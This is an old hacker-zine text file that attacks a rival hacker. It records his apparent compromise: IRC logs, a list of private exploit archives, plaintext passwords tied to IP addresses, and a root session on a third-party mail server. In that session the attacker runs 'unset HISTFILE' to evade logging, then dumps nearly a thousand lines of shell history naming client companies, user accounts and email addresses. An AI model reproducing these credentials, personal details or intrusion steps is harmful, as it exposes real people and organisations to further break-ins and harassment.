mirror of https://github.com/fdiskyou/Zines.git synced 2025-03-09 00:00:00 +01:00
Zines/dikline/skew.txt
2017-12-10 21:54:57 +00:00


#!/usr/bin/skew_gets_owned
#dk/archives/submission
#by murz
Skew, or as some know him, Tal0n, has been pissing off the wrong people.
He lies to his friends, hacks from his friends' boxes, codes shitty code, talks
way too much shit about people he shouldn't.. is there any more reason not to
own this kid? Side note: if you have a shell on one of his boxes, rm yourself;
skew has been trojaned more than my highschool prom date.
------------------------------------------------------------------------------------------------------
Checklist:
[1] Find Proof Skew == Tal0n
[2] Get into his bhugc/darkminds group and steal warez.
[3] log his passwds
[4] log his shells
[5] get his docs
[6] make him hand over all his code to me.
[7] make him state a public apology on his site, #darpa, #phrack, #darknet
------------------------------------------------------------------------------------------------------
so lets get this shit started.
[1] PR00F
(01:50:11) omgseckz : tell me the truth.. are you really tal0n ?
(01:50:32) Skew --> http://skew.blackhat.ru: yep.. but dont ever address me as my alter
ego again plz
[2] GET INTO BHUGC // DARKMINDS AND STEAL WAREZ.
May 31 18:10:32 <skew> <explaination>
May 31 18:10:36 <skew> BlackHat UnderGround Community is a community of codes in the
blackhat community that contribute code on a server that is shared with the other
blackhats who have access to it. The community stays updated and more alive when people
upload more and more private exploits, tools, shellcodes, and other non-public works of
the community member.
May 31 18:10:39 <skew> Currently, we are just starting up and may have a server in a week
or so. If you are interested in joining the community, the requirement is when the server
is up and we are organized to upload ONE exploit written by yourself and we encourage the
uploads to atleast once a month although not required.
May 31 18:10:43 <skew> </explaination>
May 31 18:11:56 <skew> akula talked to me about it today
May 31 18:12:05 <skew> i guess we better start on it
May 31 18:28:09 <skew> skew invite ppl you think would be interested in this in here
May 31 18:28:11 <skew> skew and paste them that if you like to give them a intro to BHUGC
May 31 18:28:15 <skew> skew and paste them that if you like to give them a intro to BHUGC
May 31 18:28:17 <skew> bb
Ok, looks like we're in. Here is their warez list:
====================================
14,888 priv8LEEEET.pl
25,354 openssl-too-open.tar.gz
5,969 m00-SPAm.zip
839,680 m00-deadbear3.tar.gz
12,300 557vnc.extra.c
37,787 dfnctsc-kaiten.c
7,868 imap4life.pl <-- only thing here coded by skew.. and he had a lot of help with
that even.
54,092 m00-apache-priv8.tar.gz
8,516 priv8sambar.pl
806,450 m00-deadbear2.tar.gz
805,930 m00-deadbear.tar.gz
===================================
[3] LOG HIS PASSWORDS.
2to: 24.177.23.252 user: skew pass: 5ubiZ3r0 #skew
skewtty.dyndns.org
pass_from: 212.202.49.153 user: skew pass: *jd4^52h*d2= #skew localhost
### skew rooted boxes ###
[4] LOG HIS SHELLS:
------------------------------------
skew @ plet: Here we learn Skew has mad eleet codes and can sshbrute like a bitch.
------------------------------------
login as: root
root@196.15.249.204's password:
[root@plet root]# unset HISTFILE
[root@plet root]# history
1 dig mail.nfmc.org
2 mailconf
3 dig mail.nfmc.org.za
4 dig nfmc.org.za
5 dig nfmc.org.za mx
6 mailconf
7 exit
8 cd /home/
9 adduser aawind_heather
10 passwd aawind_heather
11 mailconf
12 exit
13 passwd vepac_patcarson
14 exit
15 netconf
16 drakconnect
17 exit
18 cd /home/
19 passwd aawind_heather
20 exit
21 cd /home/
22 exit
23 ssh lin02.compumail.co.za
24 exit
25 cd /home/
26 exit
27 mailconf
28 exit
29 mailconf
30 cd /home/
31 cd motocomp
32 ll
33 userconf
34 ll
35 mailconf
36 ll /var/spool/mail/mclauren
37 passwd mclauren/
38 passwd mclauren
39 ll /var/spool/mail/mclauren
40 exit
41 ll /var/spool/mail/mclauren
42 exit
43 ll /var/spool/mail/mclauren
44 exit
45 cd /var/spool/mail/
46 exit
47 mailconf
48 exit
49 dig merchantsponsors.co.za
50 dig merchantsponsors.co.za mx
51 dig www.merchantsponsors.co.za
52 /etc/init.d/named restart
53 dig www.merchantsponsors.co.za
54 /etc/init.d/named restart
55 dig www.merchantsponsors.co.za
56 mailconf
57 ssh lin02
58 mailconf
59 exit
60 mailconf
61 cd /home/
62 adduser lw_danielle
63 mailconf
64 passwd lw_danielle
65 exit
66 vi /etc/ntp/step-tickers
67 vi /etc/ntp.conf
68 /etc/init.d/ntpd restart
69 grep ntpd /var/log/messages
70 exit
71 dig webmail.alberton.gp.school.za
72 ping induna.saix.net
73 ssh 196.15.249.203
74 mailconf
75 ping exchange.alberton.gp.scholl.za
76 ping exchange.alberton.gp.school.za
77 exit
78 mailconf
79 ifconfig
80 exit
81 mailq
82 exit
83 mailconf
84 mailq
85 mailconf
86 exit
87 cd /etc/vmail/
88 ll
89 exit
90 cd home
91 cd /home
92 ls
93 passwd
94 passwd lw_danielle
95 passwd lw_danielle\
96 passwd lw_danielle
97 mailconf
98 ls
99 passwd lw_danielle
100 exit
101 mailconf
102 ssh lin02
103 exit
104 mailconf
105 ssh lin2
106 ssh lin02
107 mailconf
108 clear
109 cd /home/
110 ls
111 cd frog
112 ll
113 cd ..
114 mailconf
115 exit
116 dig neslife.co.za mx
117 dig neslife.co.za mx @196.15.249.201
118 dig neslife.co.za mx @196.15.249.203
119 dig nestlife.co.za mx @196.15.249.203
120 mailconf
121 cd /h0ome
122 cd /home
123 ls
124 ping www.google.com
125 exit
126 mailconf
127 passwd atn_natasha
128 passwd atn_marianne
129 exit
130 mailconf
131 adduser subaru_maria
132 passwd subaru_maria
133 exit
134 cd /var/log/mail
135 vi info
136 exit
137 passwd subaru_maria
138 mailconf
139 exit
140 mailconf
141 cd /var/spool/mail
142 ll aawind_zack
143 exit
144 ssh 196.15.249.201
145 exit
146 cd\
147 cd /
148 cls
149 clear
150 mqueue
151 mailq
152 cat /var/log/mail/info | grep bsn-i.com
153 mailconf
154 ssh lin02
155 exit
156 cat /var/log/mail/info | grep vusi.sithole@nestlife.co.za
157 cat /var/log/mail/info | grep fallback.nestlife@compumail.co.za
158 clar
159 clear
160 cat /var/log/mail/info | grep fallback.nestlife@compumail.co.za
161 ssh lin02
162 exit
163 mailconf
164 exit
165 ssh lin02.lanlink.co.za
166 exit
167 mailconf
168 cd /home/
169 ls
170 adduser cm_info
171 passwd cm_info
172 userdel cm_info
173 mail
174 ll
175 adduser catchcadmapping
176 passwd catchcadmapping
177 mailconf
178 exit
179 cd /var/named/
180 ll
181 cd /etc/
182 vi named.conf
183 exit
184 mailconf
185 exit
186 rndc reload
187 rndc reload cadmapping.co.za
188 vi /var/named/sec/cadmapping.co.za
189 exit
190 vi /etc/named.conf
191 rndc reload
192 vi /etc/named.conf
193 rndc reload
194 vi /etc/named.conf
195 rm /var/named/sec/mabula.co.za
196 rm /var/named/sec/lodge.mabula.co.za
197 rm /var/named/sec/holton.co.za
198 rm /var/named/sec/ehd.co.za
199 rndc reload
200 vi /etc/named.conf
201 rndc reloa
202 rndc reload
203 rndc reload taalgenoot.co.za
204 rndc taalgenoot.co.za reloa
205 rndc reload
206 rndc reload taalgenoot.co.za
207 vi /etc/named.conf
208 rndc reload taalgenoot.co.za
209 rndc reload
210 rndc reload taalgenoot.co.za
211 tail /var/log/messages
212 vi /etc/named.conf
213 rndc reload taalgenoot.co.za
214 rndc reload
215 rndc reload taalgenoot.co.za
216 exit
217 wshaper status
218 whereis wshaper
219 vi /usr/sbin/wshaper
220 wshaper
221 whereis wshaper
222 wshaper status
223 vi /usr/sbin/wshaper
224 wshaper stop
225 wshaper
226 wshaper status
227 cd /etc/init.d/
228 ll
229 cp named wshaper
230 vi wshaper
231 rm wshaper
232 bwm
233 wshaper status
234 exit
235 mailconf
236 reboot
237 exit
238 cd /var/spool/mail/
239 mailconf
240 exit
241 passwd msp_info
242 exit
243 ssh lin02.lanlink.co.za
244 exit
245 ssh lin02.lanlink.co.za
246 exit
247 vi /etc/vmail/aliases.frogav.co.za
248 exit
249 cat /var/log/mail/info | grep arcadia.no-ip.info
250 locate fetchmail
251 exit
252 vi /etc/named.conf
253 exit
254 ssh lin02.lanlink.co.za
255 exit
256 wshaper status
257 wshaper
258 netstat -an | grep :25
259 df -h
260 exit
261 /etc/init.d/sendmail restart
262 /etc/init.d/sendmail stop
263 /etc/init.d/sendmail start
264 ssh uvongo
265 exit
266 mailconf
267 dig www.khuphukani.co.za
268 dig www.khuphukani.co.za @196.15.249.203
269 userconf
270 mailconf
271 cd /home
272 ls
273 mailconf
274 adduser kh_info
275 adduser kh_sales
276 adduser kh_susanb
277 adduser kh_alessia
278 adduser kh_technical
279 passwd kh_info
280 passwd kh_sales
281 passwd kh_susanb
282 passwd kh_alessia
283 passwd kh_technical
284 mailconf
285 cd /var/spool/mail/
286 ls
287 ls kh_ -s
288 ls -s
289 exit
290 df -h
291 /etc/init.d/sendmail stop
292 pf -ef | grep sendmail
293 ps
294 psps -ef | grep sendmail
295 ps -ef | grep sendmail
296 /etc/init.d/sendmail start
297 tail -f /var/log/mail/info
298 mailconf
299 vi /var/lib/mailertable
300 cd /etc/vmail/
301 ll aliases.alltransportneeds.co.za
302 vi /var/lib/mailertable
303 vi aliases.alltransportneeds.co.za
304 mailconf
305 ll *atn*
306 ll
307 mailconf
308 cd /var/named/sec/
309 ll
310 mailconf
311 dig atn.co.za mx
312 dig atn.co.za ns
313 dig alltransportneeds.co.za ns
314 wshaper status
315 exit
316 ifconfig
317 exit
318 telnet 127.0.0.1 110
319 telnet 127.0.0.1 25
320 exit
321 dig pop.khupukano.co.za
322 mailconf
323 passwd hk_info
324 passwd kh_info
325 passwd kh_technical
326 passwd kh_alissia
327 cd /home
328 passwd kh_alessia
329 passwd kh_sales
330 passwd kh_susanb
331 passwd kh_technical
332 dig pop.khuphukani.co.za
333 /etc/init.d/named resatrt
334 /etc/init.d/named restart
335 dig pop.khuphukani.co.za
336 exit
337 cd /home
338 ls
339 passwd kh_technical
340 exit
341 clear
342 mailconf
343 adduser patm_kzn
344 passwd patm_kzn
345 adduser patm_wc
346 passwd patm_wc
347 adduser patm_er
348 passwd patm_er
349 passwd patm_nr
350 adduser patm_nr
351 passwd patm_nr
352 mailconf
353 exit
354 dig ub.co.zamx
355 dig ub.co.za mx
356 mailconf
357 exit
358 cd /
359 cd /etc/vmail/
360 cat aliases.delvenco.co.za
361 mailconf
362 cd /var/spool/mail/
363 ll catchdelvenco
364 ll -h catchdelvenco
365 ll -m catchdelvenco
366 ll catchdelvenco
367 exit
368 mailconf
369 exit
370 adduser catchibe
371 mailconf
372 adduser ibe_sandyb
373 adduser ibe_roadmech
374 adduser ibe_ibe
375 adduser ibe_tarbaby
376 passwd ibe_sandyb
377 passwd ibe_roadmech
378 passwd ibe_tarbaby
379 passwd ibe_ibe
380 ssh knysna.compumail.co.za
381 exit
382 mailq
383 exit
384 tail -f /var/log/mail/info | grep hotmail.com
385 exity
386 exit
387 tail -f /var/log/mail/info | grep italpizza.co.za
388 passwd emp-judy
389 tail -f /var/log/mail/info | grep italpizza.co.za
390 ssh lin02
391 mailconf
392 exit
393 mailconf
394 l /var/spool/mail/ibe_ibe
395 ll /var/spool/mail/ibe_ibe
396 tail -f /var/log/mail/info | grep ibe.co.za
397 ll /var/spool/mail/ibe_ibe
398 tail -f /var/log/mail/info | grep ibe.co.za
399 exit
400 clear
401 mailconf
402 /etc/init.d/sendmail restart
403 exit
404 vi /etc/vmail/aliases.falstaff.co.za
405 mailconf
406 cd /etc/
407 vi named.conf
408 dig mx delvenco.co.za
409 exit
410 cd /var/spool/mail/
411 grep no-ip.info *
412 ll ber*
413 cd /etc/vmail/
414 cat aliases.delvenco.co.za
415 cat aliases.alltransportneeds.co.za
416 mailconf
417 cat aliases.onestar.co.za
418 mailconf
419 cd /
420 exit
421 mailconf
422 cd /etc/vmail/
423 mailconf
424 /etc/init.d/sendmail stop
425 /etc/init.d/sendmail start
426 vi /root/.fetchmailrc
427 passwd catchonestar
428 cd /var/lib/
429 ll
430 vi mailertable
431 passwd catchdelvenco
432 ll /var/spool/mail/catchliber*
433 cd /var/spool/mail/
434 ll *liber*
435 exit
436 cd /home/
437 mailconf
438 clear
439 sendmail restart
440 /etc/init.d/sendmail restart
441 exit
442 mailconf
443 ssh lin02
444 exit
445 ssh 196.25.45.234
446 exit
447 autopasswd
448 autopasswd --help
449 autopasswd -S joe
450 whereis autopassword
451 whereis autopasswrd
452 whereis autopasswd
453 file /usr/bin/autopasswd
454 vi /usr/bin/autopasswd
455 cd /home/joe/
456 ll
457 genpassHex -?
458 genpassHex password
459 man genpassHex
460 whereis genpassHex
461 more /usr/bin/genpassHex
462 exit
463 vi /etc/named.conf
464 33
465 ll
466 cd /var/named/sec/
467 rll
468 ll
469 ll pak*
470 exit
471 ssh parktonian.n0-ip.info
472 ssh parktonian.no-ip.info
473 ssh parktonian.n0-ip.infoparktonian.n0-ip.info
474 ssh 165.165.80.124
475 ssh 165.165.80.1
476 ssh 165.165.85.80
477 ssh parktonian.no-ip.info
478 ping parktonian.no-ip.info
479 ssh parktonian.no-ip.info
480 ssh 165.165.85.80
481 ssh parktonian.no-ip.info
482 exity
483 exit
484 mailconf
485 adduser tisc_derek.house
486 passwd tisc_derek.house
487 userdel tisc_tisc_derek.house -r
488 userdel tisc_tisc.derek.house -r
489 userdel tisc_derek.house -r
490 useradd tisc_d.house -r
491 useradd tisc_d.house
492 mailconf
493 cd /home
494 ls
495 userdel tisc_d.house
496 useradd tisc_d.house
497 passwd tisc_d.house
498 cd /var/named/
499 ls
500 malconf
501 mailconf
502 dig mail.tiscpty.com
503 ifconfig
504 passwd tisc_d.house
505 dig webmail.tiscpty.com
506 dig webmail.tiscpty.com mx
507 cd home
508 cd /home
509 ls
510 passwd tisc_d.house
511 /etc/init.d/sendmail restart
512 [root@plet home]# ls tisc
513 userdel tisc_d.house
514 useradd d.house
515 passwd house
516 passwd d.house
517 mailconf
518 dig mail.tiscpty.com
519 dig tiscpty.com mx
520 dig tiscpty.com mx @192.168.20.2
521 mailconf
522 dig tiscpty.com x
523 dig tiscpty.com mx
524 dig tiscpty.com mx @196.25.1.1
525 dig tiscpty.com mx @induna.saix.net
526 userdel d.house -r
527 ls
528 exit
529 mailconf
530 passwd emp-judy
531 exit
532 mailconf
533 exit
534 cd home
535 cd /
536 ls
537 cd home
538 ls
539 exit
540 mailconf
541 ifconfig
542 mailconf
543 /etc/sen
544 cd /etc/init.d/sendmail status
545 cd /etc/init.d/sendmail stop
546 /etc/init.d/sendmail status
547 /etc/init.d/sendmail status stop
548 /etc/init.d/sendmail stop
549 /etc/init.d/sendmail start
550 /etc/init.d/sendmail restart
551 cd /var/spool/mail/
552 ls tisc_d.house
553 rm tisc_d.house
554 ls tisc_d.house
555 ls mailconf
556 mailconf
557 ls tisc_d.house
558 exit
559 mailconf
560 mailconf\
561 mailconf
562 ifconfig
563 exit
564 tail -f errors | grep tiscpty.comtail -f errors | grep tiscpty.com
565 cd /var/log
566 cd mail
567 ls
568 tail -f info | grep tiscpty
569
570 tail -f info | grep tiscpty
571 exit
572 mailconf
573 /etc/init.d/sendmail restart
574 cd /var/log
575 ls
576 vi mail
577 cd mail
578 ls
579 vi errors
580 ls
581 vi info
582 ls
583 tail -f errors | grep tiscpty.com
584 mailconf
585 exit
586 cd /home/
587 mailconf
588 adduser subaru_parts
589 passwd subaru_parts
590 exit
591 wshaper start
592 mailq
593 mailstat
594 deldefermail
595 mailq
596 whereis deldefermail
597 vi /usr/sbin/de;def
598 vi /usr/sbin/deldefermail
599 delqueue
600 mailq
601 whereis delqeue
602 whereis delqueue
603 vi /usr/sbin/delqueue
604 mailq
605 vi /usr/sbin/delqueue
606 sendmail -?
607 man sendmail
608 whereis sendmailspool
609 vi /usr/sbin/sendmailspool
610 exit
611 fsav -v
612 fsav --version
613 df -h
614 exit
615 dig kirk.co.za mx
616 mailconf
617 /etc/init.d/postfix restart
618 /etc/init.d/sendmail restart
619 exit
620 cd /etc/ma
621 cd /etc/mail
622 ll
623 vi relay_allow
624 vi virtusertable
625 vi name_allow
626 ll
627 cat access
628 /etc/init.d/xinetd restart
629 /etc/init.d/network restart
630 /etc/init.d/sendmail stop
631 /etc/init.d/sendmail start
632 wshaper status
633 tail -f /var/log/mail/info
634 chkconfig --list
635 cd /var/spool/
636 cd mail/
637 ll kirk_*
638 ll -h kirk_*
639 ll -m kirk_*
640 rm -rf kirk_fallback
641 mailconf
642 /etc/init.d/sendmail stop
643 /etc/init.d/sendmail start
644 pwd
645 ll -h
646 ll -?
647 ll
648 ll -H
649 ls -h
650 ls -H
651 ls -lah
652 man ll
653 ll kirk_*
654 df -h
655 ll
656 ll | more
657 rm ll_joe
658 ll | more
659 mailconf
660 /etc/init.d/sendmail stop
661 /etc/init.d/sendmail start
662 grep zacron passwd
663 grep zacron /etc/passwd
664 userdel -r catchzacron
665 userdel -r zacron_events
666 userdel -r zacron_zach
667 userdel -r zacron_zie
668 mail
669 df -h
670 ll
671 ll | more
672 rm -f BOGUS.alanna.*
673 ll | more
674 rm -f ssmark
675 exit
676 tcpdump -ni eth0 src 165.146.147.111
677 ping 165.146.147.111
678 tcpdump -ni eth0 src 165.146.147.111
679 tcpdump -ni eth0 src 165.146.100.119
680 netstat -an | grep 165.146.100.119
681 netstat -an | more
682 netstat -an
683 df -h
684 /etc/init.d/network restart
685 /etc/init.d/xinetd restart
686 locate netstat
687 tail -f /var/log/mail/info
688 tail -f /var/log/mail/info | grep 165.146.100.119
689 grep 165.146.100.119 /var/log/mail/info
690 tail -f /var/log/mail/info | grep 165.146.100.119
691 wshaper status
692 wshaper stop
693 tail -f /var/log/mail/info | grep 165.146.100.119
694 tail -f /var/log/mail/info
695 tail -f /var/log/mail/info | grep ipop3d
696 top
697 tail -f warnings | grep kirk
698 cd /var/log
699 tail -f warnings | grep kirk
700 cd /mail
701 cd mail
702 tail -f warnings | grep kirk
703 exit
704 cd /var/log
705 ls
706 tail -f messages | grep kirk
707 ifconfig
708 tail -f messages | grep kirk
709 mailconf
710 exit
711 cd /var/log
712 ls
713 cd mail
714 ls
715 tail -f errors | grep kirk
716 mailconf
717 exit
718 cd /var/log
719 ls
720 cd mail
721 ls
722 vi errors
723 vi info
724 mailconf
725 tail -f info | grep kirk
726 exit
727 ssh 196.15.249.201
728 exit
729 cd /var/named/
730 ls
731 cd sec/
732 ll
733 cp r-r-m.co.za ratana.co.za
734 vi r-r-m.co.za
735 vi ratana.co.za
736 exit
737 date
738 ssh 196.15.249.203
739 exit
740 ssh 196.15.249.203
741 date
742 exit
743 tail -f /var/log/mail/info | grep ub_saul@compumail.co.za
744 exit
745 cd /home
746 ls
747 mailconf
748 exit
749 cd /var/named/
750 ls
751 cd sec/
752 ls
753 cp ratana.co.za iphiko.co.za
754 vi iphiko.co.za
755 exit
756 /etc/init.d/named restart
757 vi /var/log/messages
758 clear
759 tail -f /var/log/messages
760 exit
761 cd /var/log/mail/
762 grep deebar.co.za info
763 exit
764 wshaper statuis
765 wshaper status
766 wshaper stop
767 wshaper
768 wshaper status
769 exit
770 top
771 cd /proc/
772 ll
773 ll filesystems
774 cat filesystems
775 ll fs
776 ll ide/
777 ll
778 cat sys/fs/file-max
779 cat sys/fs/inode-
780 cat sys/fs/inode-nr
781 cat sys/fs/inode-state
782 cat sys/kernel/sysrq
783 cat sys/vm/bdflush
784 echo 100 5000 640 2560 150 30000 5000 1884 2 > /proc/sys/vm/bdflush
785 ulimit
786 ulimit -?
787 ulimit -u 2048
788 mem
789 free
790 free -?
791 top
792 ps -ef
793 cd /etc/rc.d/
794 vi rc.local
795 echo 8192 > /proc/sys/fs/file-max
796 echo 8192 > /proc/sys/fs/inode-max
797 echo 1 > /proc/sys/kernel/sysrq
798 echo 6 > /proc/sys/net/ipv4/tcp_syn_retries
799 echo 90 > /proc/sys/net/ipv4/tcp_fin_timeout
800 echo 0 > /proc/sys/net/ipv4/tcp_timestamps
801 ulimit -u 2048
802 echo 100 5000 640 2560 150 30000 5000 1884 2 > /proc/sys/vm/bdflush
803 /usr/local/sbin/mii-diag -A 100baseTx-FD eth1
804 /usr/local/sbin/mii-diag -A 100baseTx-FD eth0
805 /usr/local/sbin/mii-diag -F 100baseTx-FD eth1
806 vi rc.local
807 exit
808 mailconf
809 ll /var/spool/mail/atn_mark
810 ll /var/spool/mail/atn_barney
811 tail -f /var/log/mail/info | grep @alltransportneeds.co.za
812 ll /var/spool/mail/atn_barney
813 ll /var/spool/mail/atn_mark
814 tail -f /var/log/mail/info | grep @alltransportneeds.co.za
815 cat /var/log/mail/info | grep @alltransportneeds.co.za
816 vi mailconf
817 mailconf
818 tail -f /var/log/mail/info | grep @atn.co.za
819 cat /var/log/mail/info | grep @alltransportneeds.co.za
820 exit
821 ifconfig
822 mailconf
823 adduser ratan_gavin
824 userdel ratan_gavin /r
825 userdel ratan_gavin -rt
826 userdel ratan_gavin -r
827 adduser ratana_gavin
828 passwd ratana_gavin
829 exit
830 mailconf
831 adduser ratana_bianca
832 adduser ratana_brian
833 adduser ratana_aub
834 adduser ratana_ntabiseng
835 passwd ratana_bianca
836 passwd ratana_brian
837 passwd ratana_aubrey
838 passwd ratana_ntabiseng
839 cat /var/log/messages
840 ssh knysna.compumail.co.za
841 exit
842 mailq
843 /etc/init.d/sendmail stop
844 man sendmail
845 cd /var/spool/mqueue/
846 ll
847 rm -f *
848 /etc/init.d/sendmail start
849 ll
850 mailq
851 exit
852 ssh 196.34.39.26
853 mailq
854 exit
855 reboot
856 exit
857 ping sodwana
858 exit
859 cd /etc/vmail/
860 ll aliases.alltransportneeds.co.za
861 exit
862 ssh hitek.no-ip.info
863 mail
864 ping hitek.no-ip.info
865 drakconf
866 cat /var/lib/mailertable
867 cat /var/lib/mailertable | grep logisticor
868 exit
869 locate wshap
870 vi /usr/sbin/wshaper
871 exit
872 mailconf
873 ssh 196.15.249.201
874 ssh 196.25.45.246
875 ssh andre@196.25.45.246
876 exit
877 ssh umglanga.compumail.co.za
878 exit
879 ssh lin02
880 ssh 196.25.45.254
881 exit
882 dig mail.tiscali.co.za
883 exit
884 df -h
885 ll
886 cd /
887 locate iso
888 locate iso | more
889
890 ssh 196.15.249.207
891 exit
892 mailconf
893 exit
894 ssh lin02.lanlink.co.za
895 exit
896 mail mark@mentorfreight.co.za
897 exit
898 mailconf
899 cd /var/spool/mail/
900 ll mentor
901 cat mentor
902 mailconf
903 cat catchmf
904 ll catchmft
905 ll catchmtf
906 passwd catchmtf
907 exit
908 tail -f /var/log/mail/info | grep hi-tek.co.za
909 exit
910 mailconf
911 tail -f /var/log/mail/info | grep catchhitek
912 exit
913 vi /var/lib/mailertable
914 exit
915 mailconf
916 cd /home/
917 adduser catchhitek
918 passwd catchhitek
919 mailconf
920 ll /var/spool/mail/catchhitek
921 mailconf
922 ll /var/spool/mail/catchhitek
923 tail -f /var/log/mail/info | grep logisticor.com
924 ssh mail.logisticor.com
925 telnet mail.logisticor.com 25
926 ssh mail.logisticor.com
927 ssh joe@mail.logisticor.com
928 telnet mail.logisticor.com 25
929 exit
930 clear
931 tail -f /var/log/mail/info | grep hi-tek.co.za
932 tail -f /var/log/mail/info | grep wynand
933 ssh lin02.compumail.co.za
934 ping lin02.compumail.co.za
935 ssh lin02.compumail.co.za
936 ping lin02.compumail.co.za
937 ssh lin02.compumail.co.za
938 mailconf
939 ssh lin02.compumail.co.za
940 telnet mail.logisticor.com 25
941 ssh lin02.compumail.co.za
942 exit
943 cat /var/log/mail/info | grep histologic.co.za
944 mailconf
945 cat /var/log/mail/info | grep catchhisto
946 tail -f /var/log/mail/info | grep catchhisto
947 tail -f /var/log/messages
948 tail -f /var/log/mail/info | grep catchhisto
949 exit
950 tail -f /var/log/mail/info | grep histologic.co.za
951 ll /var/spool/mail/catchhisto
952 exit
953 ll /var/spool/mail/catchhisto
954 exit
955 mailconf
956 ssh lin02.lanlink.co.za
957 exit
958 mailconf
959 tail -f /var/log/mail/info | grep histologic.co.za
960 ll /var/spool/mail/catchhisto
961 tail -f /var/log/mail/info
962 tail -f /var/log/mail/info | grep catchhisto
963 exit
964 ssh histologic.no-ip.info
965 exit
966 cat /etc/vmail/aliases.subaru-pretoria.co.za
967 adduser subaru_marelie
968 vi /etc/shadow
969 vi /etc/vmail/aliases.subaru-pretoria.co.za
970 vi /etc/shadow
971 exit
972 ssh knysna.compumail.co.za
973 tail -f /var/log/mail/info | grep 165.146.101.31
974 mailconf
975 dig frogav.co.za mx
976 dig frogav.co.za mx @196.43.1.14
977 mailconf
978 exit
979 mailconf
980 ssh lin02.compumail.co.za
981 adduser htgina
982 passwd htgina
983 mailconf
984 exit
985 w
986 login root
987 logout
988 exit
989 w
990 logout
991 unset HISTFILE
992 history
[root@plet root]# ls -la
total 297498
drwx------ 34 root root 3688 Jun 9 11:45 ./
drwxr-xr-x 21 root adm 880 May 30 08:20 ../
lrwxrwxrwx 1 root root 41 Feb 27 2003
.DCOPserver_plet.compumail.co.za_:0 -> /root/.DCOPserver_plet.compumail.co.za__0
-rw-r--r-- 1 root root 67 Mar 13 2003 .DCOPserver_plet.compumail.co.za__0
-rw------- 1 root root 434 Jun 12 2004 .ICEauthority
-rw------- 1 root root 312 May 8 16:06 .Xauthority
-rw-r--r-- 1 root root 1479 Feb 16 2002 .Xdefaults
-rw------- 1 root root 15889 Jun 14 01:21 .bash_history
-rw-r--r-- 1 root root 24 Feb 16 2002 .bash_logout
-rw-r--r-- 1 root root 106 Feb 16 2002 .bash_profile
-rw-r--r-- 1 root root 226 Feb 16 2002 .bashrc
drwx------ 2 root root 72 Oct 20 2003 .cedit/
drwxr-xr-x 3 root root 96 Sep 3 2003 .cpan/
-rw-r--r-- 1 root root 233 Feb 16 2002 .cshrc
-rw-r--r-- 1 root root 14 Feb 9 2003 .desktop
-rw------- 1 root root 222 Feb 9 2003 .draksync
-rwx--x--- 1 root root 538 Mar 30 2004 .fetchmailrc*
drwx------ 4 root root 128 Mar 13 2003 .gconf/
drwx------ 2 root root 80 Mar 13 2003 .gconfd/
drwxr-xr-x 2 root root 72 Feb 9 2003 .gnome/
drwx------ 3 root root 96 Mar 13 2003 .gnome2/
drwx------ 2 root root 48 Mar 13 2003 .gnome2_private/
drw------- 2 root root 200 Nov 2 2003 .gnupg/
-rw-r--r-- 1 root root 149 Feb 9 2003 .gtkrc
-rw-r--r-- 1 root root 124 Feb 9 2003 .gtkrc-2.0
-rw-r--r-- 1 root root 1111 Feb 9 2003 .gtkrc-kde
drwxr-xr-x 2 root root 112 Feb 9 2003 .icewm/
-rw-r--r-- 1 root root 160 Feb 9 2003 .info_perso
drwx------ 2 root root 48 Jun 11 2004 .inspect_tmp_dir/
drwxr-xr-x 4 root root 192 Feb 8 2003 .kde/
drwxr-xr-x 3 root root 144 Jun 15 2004 .mc/
drwxr-xr-x 2 root root 80 Feb 8 2003 .mcop/
-rw------- 1 root root 31 Feb 9 2003 .mcoprc
drwxr-xr-x 5 root root 144 Mar 13 2003 .mozilla/
drwxr-xr-x 2 root root 176 Feb 8 2003 .qt/
-rw-r--r-- 1 root root 135 Aug 31 2004 .rpmdrake
drwx------ 2 root root 80 Sep 15 2003 .spamassassin/
drwx------ 2 root root 136 Nov 14 2004 .ssh/
-rw-r--r-- 1 root root 189 Feb 16 2002 .tcshrc
-rw------- 1 root root 6112 Jun 9 11:45 .viminfo
-rw------- 1 root root 0 Mar 24 2004 .viminfo.tmp
-rw------- 1 root root 4096 Nov 26 2004 .viminfy.tmp
-rw------- 1 root root 0 Mar 24 2004 .viminfz.tmp
-rw-r--r-- 1 root root 3750 Feb 16 2002 .vimrc
-rw-r--r-- 1 root root 6 Feb 9 2003 .wmrc
-rw-r--r-- 1 root root 13396 Feb 8 2003 .xftcache
-rw------- 1 root root 9860 Aug 20 2003 .xsession-errors
-rwxr-xr-x 1 root root 3741018 Jun 14 2004
BitDefender-sendmail-1.5.5-2.linux-gcc3x.i586.tar.run*
-rw-r--r-- 1 root root 2394 Sep 3 2004 Creport
drwx------ 3 root root 152 Feb 9 2003 Desktop/
drwxr-xr-x 2 root root 48 Feb 9 2003 Documents/
drwx------ 7 root root 520 Jun 12 2004 Mail/
-rw-r--r-- 1 root root 2184 Sep 3 2004 Sreport
-rw-r--r-- 1 root root 628757 Mar 12 2004
XAM-BE-33-29672-LINUX-glibc23-sm11.tar.gz
-rw-r--r-- 1 root root 1082040 Jun 15 2004
XAM-BE-33-31609-LINUX-glibc23-sm11.tar.gz
-rw-r--r-- 1 root root 848085 Jun 18 2004
XAM-BE-33-31642-LINUX-glibc22-sm11.tar.gz
-rw-r--r-- 1 root root 1088878 Sep 3 2004
XAM-LEVEL3-33-33946-LINUX-glibc23-sm11.tar.gz
-rw-r--r-- 1 root root 1090708 Sep 10 2004
XAM-LEVEL3-33-34116-LINUX-glibc23-sm11.tar.gz
-rwxr-x--x 1 root root 513 Jan 4 16:14 aliases.frogav.co.za*
drwxr-xr-x 2 root root 1080 Nov 24 2004 altermime-0.3.6/
-rw-r--r-- 1 root root 69604 Nov 24 2004 altermime-0.3.6.tar.gz
drwxr-xr-x 8 joe joe 1096 Aug 31 2004 apg-2.2.3/
-rw-r--r-- 1 root root 49779 Aug 31 2004 apg-2.2.3-1mdk.i586.rpm
-rw-r--r-- 1 root root 108186 Aug 31 2004 apg-2.2.3.tar.gz
-rwxr-xr-x 1 root root 170 May 29 2003 cleanxmime*
-rw------- 1 root root 61440 May 9 12:47 core.13099
-rw------- 1 root root 61440 May 9 12:47 core.13184
-rw------- 1 root root 61440 May 9 12:47 core.13191
-rw------- 1 root root 61440 Apr 8 08:16 core.18972
-rw-r--r-- 1 root root 497631 Oct 2 2003 csav-4.80.7-shared.i386.rpm
-rw------- 1 root root 2270855 May 30 15:04 dead.letter
-rw-r--r-- 1 root root 23200 Jan 21 2004 doc_linux.zip
-rw-r--r-- 1 root root 1473 Mar 12 2004 domainlist
drwx------ 2 root root 272 Feb 8 2003 drakx/
